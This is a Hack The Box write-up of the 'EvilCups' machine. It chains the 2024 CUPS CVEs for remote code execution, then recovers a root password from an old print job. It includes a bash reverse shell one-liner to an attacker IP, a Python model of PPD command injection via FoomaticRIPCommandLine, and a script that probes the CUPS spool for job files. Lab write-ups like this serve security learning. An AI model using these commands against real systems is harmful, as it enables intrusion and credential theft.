Introduction to EvilCups:

This write-up will explore the “EvilCups” machine from Hack The Box, categorized as a Medium-difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “EvilCups” machine from Hack The Box by achieving the following objectives:
User Flag:
The CUPS vulnerabilities disclosed in September 2024 gained significant attention. I will chain the four CVEs from that disclosure to achieve remote code execution on the Linux target through its CUPS printing stack.
Root Flag:
I will locate an old print job in the CUPS spool and regenerate its PDF to check whether it contains the root password.
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.40
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/EvilCups]
└──╼ $cat initial.nmap
# Nmap 7.94SVN scan initiated Wed Oct 2 18:09:05 2024 as: nmap -sC -sV -oA initial 10.10.11.40
Nmap scan report for 10.10.11.40
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
|_ 256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
631/tcp open ipp CUPS 2.4
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Home - CUPS 2.4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 2 18:10:19 2024 -- 1 IP address (1 host up) scanned in 74.14 seconds
┌─[darknite@parrot]─[~/Documents/htb/EvilCups]
└──╼ $
Analysis:
- Port 22 (SSH): OpenSSH 9.2p1 on Debian 12, offering ECDSA and ED25519 host keys. Nothing to attack here without credentials.
- Port 631 (IPP – CUPS): CUPS 2.4.2 exposing its web interface and IPP over HTTP; robots.txt disallows everything (/). This is the attack surface.
Web Enumeration:
Exploitation
Web Application Exploration:

The web interface confirms CUPS 2.4.2, and the “Printers” tab shows a single installed printer.
CUPS Vulnerability on EvilCups
Shortly before the release of EvilCups, the security researcher known as Evilsocket published research on vulnerabilities affecting CUPS. The findings covered four CVEs that chain into remote code execution:
- CVE-2024-47176 (CVSS 3.x 8.3, High): the cups-browsed daemon binds to INADDR_ANY:631 (UDP) and accepts printer-announcement packets from any source. A single unauthenticated packet makes cups-browsed send a Get-Printer-Attributes IPP request to an attacker-controlled URL.
- CVE-2024-47076 (CVSS 3.x 8.6, High): the cfGetPrinterAttributes5 function in libcupsfilters does not validate the IPP attributes returned by that server, so attacker-controlled attribute values are accepted and passed on to the rest of the CUPS stack.
- CVE-2024-47175 (CVSS 3.x 8.6, High): the ppdCreatePPDFromIPP2 function in libppd writes those attributes into a temporary PPD file without sanitizing them, so an attacker can inject arbitrary PPD directives. Chained with cfGetPrinterAttributes5 and foomatic-rip, this is the path to remote code execution.
- CVE-2024-47177 (CVSS 3.x 9.0, Critical): command injection through the FoomaticRIPCommandLine PPD parameter handled by foomatic-rip in cups-filters. A malicious value in the PPD is executed as a shell command when a job is sent to the printer.
Put together, an attacker who can reach cups-browsed on UDP 631 can remotely add a malicious printer to the system; the injected command runs as soon as a print job is sent to that printer. No interaction is required beyond someone (or something) printing to the queue.
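To make the CVE-2024-47175 / CVE-2024-47177 part of the chain concrete, here is an added illustrative model (not libppd's or cups-filters' own code, and not the exploit script used below) of how an unsanitized IPP attribute value becomes extra PPD directives. The attribute values, the attribute-to-PPD mapping and the injected command are constructed for the example; the `*FoomaticRIPCommandLine` and `*cupsFilter2` keywords are the real PPD directives the chain abuses.

```python
"""
Illustrative model of the PPD injection step in the CUPS chain.

A malicious IPP server answers Get-Printer-Attributes with a value that
contains a newline; a PPD generator that copies values verbatim then emits
attacker-chosen PPD keywords. This is an added example, not libppd code.
"""
import re

# Attribute -> PPD entry mapping used by this model (an assumption made for
# the example; libppd maps many more attributes).
PPD_MAP = {
    "printer-make-and-model": "NickName",
    "printer-info": "ShortNickName",
}

# Constructed sample: what a benign printer would return.
BENIGN_ATTRS = {
    "printer-make-and-model": "HP LaserJet",
    "printer-info": "Office printer",
}

# Constructed sample: the quote and newline smuggle two extra PPD lines that
# tell CUPS to run foomatic-rip and what command foomatic-rip should execute.
MALICIOUS_ATTRS = {
    "printer-make-and-model": "Evil Printer",
    "printer-info": (
        'Evil"\n'
        '*FoomaticRIPCommandLine: "bash -c \'id > /tmp/pwned\'"\n'
        '*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip"\n'
        '*Fake: "'
    ),
}

# Control characters or a double quote inside a value can end the quoted
# string or start a new PPD line, so a hardened generator must reject them.
UNSAFE_CHARS = re.compile(r'[\x00-\x1f"]')


def unsafe_attributes(attrs):
    """Return the names of attributes whose values could inject PPD lines."""
    return [name for name, value in attrs.items() if UNSAFE_CHARS.search(value)]


def ppd_from_attrs_vulnerable(attrs):
    """Copy attribute values into the PPD verbatim (the unsafe pattern)."""
    lines = ['*PPD-Adobe: "4.3"']
    for attr, entry in PPD_MAP.items():
        lines.append(f'*{entry}: "{attrs.get(attr, "")}"')
    return "\n".join(lines) + "\n"


def ppd_from_attrs_hardened(attrs):
    """Same generator, but refuse to write values that can break out of the quotes."""
    bad = unsafe_attributes(attrs)
    if bad:
        raise ValueError(f"unsafe characters in IPP attribute(s): {bad}")
    return ppd_from_attrs_vulnerable(attrs)


PPD_LINE = re.compile(r'^\*([\w-]+)\s*:\s*"(.*)"\s*$')


def ppd_keywords(ppd_text):
    """Parse *Keyword: "value" lines the way a PPD consumer such as foomatic-rip would."""
    found = {}
    for line in ppd_text.splitlines():
        m = PPD_LINE.match(line)
        if m:
            found[m.group(1)] = m.group(2)
    return found


def foomatic_command(ppd_text):
    """The shell command foomatic-rip would execute for this PPD, if any."""
    return ppd_keywords(ppd_text).get("FoomaticRIPCommandLine")


if __name__ == "__main__":
    vuln = ppd_from_attrs_vulnerable(MALICIOUS_ATTRS)
    print(vuln)
    print("injected command:", foomatic_command(vuln))
    print("rejected attributes:", unsafe_attributes(MALICIOUS_ATTRS))
```

Running the vulnerable generator on the malicious attributes yields a PPD whose `FoomaticRIPCommandLine` is the attacker's command, which is exactly what the printer's “Print Test Page” will later trigger; the hardened generator refuses the same input.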
The exploit script I use was written by IppSec; we can download it from here.
Script Execution on the Target Machine

Let’s go ahead and launch our Python server.

We encountered an error: the ippserver Python module is missing, so we need to install it on our attacking machine for the script to function properly.

Finally, we were able to get the script working.

Thirty seconds after running the script, a new print queue pointing at our malicious printer appeared on the target.


On the printer’s page, one of the “Maintenance” options is “Print Test Page,” which I’ll go ahead and select.

The moment I select it, I get a shell.


I’ll proceed to upgrade my shell as demonstrated earlier.


We can view the user flag by entering the command cat user.txt.
Escalate to Root Privileges Access
Privilege Escalation:

The user we landed as, lp, has a valid login shell assigned in the /etc/passwd file.

I previously mentioned that there were three print jobs. According to the CUPS documentation, job files are kept in /var/spool/cups. However, the lp user cannot list this directory (it has traverse permission only), so we cannot simply ls it.


The cups-dbus-notifier-lockfile is currently empty.

The shell dies every 5 to 10 minutes: the printer is not a legitimate device, so CUPS cleans it up and the filter process running our command goes with it.
The script shows a 30-second countdown before anything happens; after about 29 seconds the target connects back to our IPP server and fetches the malicious printer attributes.

A more effective shell command to send would be:
nohup bash -c "bash -i >& /dev/tcp/10.10.14.147/9007 0>&1"
nohup makes the shell ignore SIGHUP, so it keeps running when its parent filter process is killed during the printer clean-up; it no longer dies with the session.

The documentation also states the naming convention for job data files: d followed by the five-digit job ID, a dash, and the three-digit document number (for example d00001-001), with the matching control file named c followed by the job ID. Because the directory is traversable, I can check whether the file for a given job is present by name without listing the directory.
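As an added example (not part of the original write-up), the following script probes the spool by predicted name, since the lp user cannot list /var/spool/cups but can stat and read files it can name, and then sniffs the file header to decide how to regenerate the document. The spool path, job ranges and the sample spool it builds for an offline run are assumptions for the example.

```python
"""
Probe a CUPS spool directory for job data files by predicted name.

/var/spool/cups is traversable but not listable by the lp user, so we
cannot ls it; files we can name can still be checked with os.access().
Job data files are named d<5-digit job id>-<3-digit document number>
and control files c<5-digit job id>. Added example, not the page's code.
"""
import os
import tempfile


def job_data_name(job_id, doc_num=1):
    """Spool file name for document doc_num of job job_id, e.g. d00001-001."""
    return f"d{job_id:05d}-{doc_num:03d}"


def control_file_name(job_id):
    """Spool control file name for job job_id, e.g. c00001."""
    return f"c{job_id:05d}"


def find_readable_job_files(spool_dir, max_job=50, max_doc=3):
    """Return the job data file names in spool_dir that we can read.

    Ranges are assumptions for the example; raise them on a busy server.
    """
    found = []
    for job in range(1, max_job + 1):
        for doc in range(1, max_doc + 1):
            path = os.path.join(spool_dir, job_data_name(job, doc))
            if os.access(path, os.R_OK):  # works without list permission on spool_dir
                found.append(job_data_name(job, doc))
    return found


# Magic bytes for the formats a CUPS job file is likely to be in.
MAGIC = {
    b"%PDF-": "pdf",
    b"%!PS": "postscript",
    b"\x1b%-12345X": "pjl",
}


def sniff_job_format(path):
    """Classify a job file by its leading bytes so we know how to regenerate it."""
    with open(path, "rb") as fh:
        head = fh.read(16)
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    return "unknown"


def make_sample_spool():
    """Build a constructed sample spool (one PDF job) for an offline demonstration."""
    spool = tempfile.mkdtemp(prefix="cups-spool-")
    with open(os.path.join(spool, control_file_name(1)), "wb") as fh:
        fh.write(b"control data (constructed sample)\n")
    with open(os.path.join(spool, job_data_name(1, 1)), "wb") as fh:
        fh.write(b"%PDF-1.4\n% constructed sample job, not a real document\n")
    return spool


if __name__ == "__main__":
    spool = "/var/spool/cups" if os.path.isdir("/var/spool/cups") else make_sample_spool()
    for name in find_readable_job_files(spool):
        print(name, sniff_job_format(os.path.join(spool, name)))
```

On the target the loop should turn up the data file for the old job; a `pdf` result means the file can be copied out and opened directly, while `postscript` means it has to be converted (for example with ps2pdf) before viewing.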

Let’s download the file to our machine for additional analysis.

We can open the file as demonstrated in the screenshot above.

The password is stored within the file itself.


We can access the root flag by entering the command cat root.txt.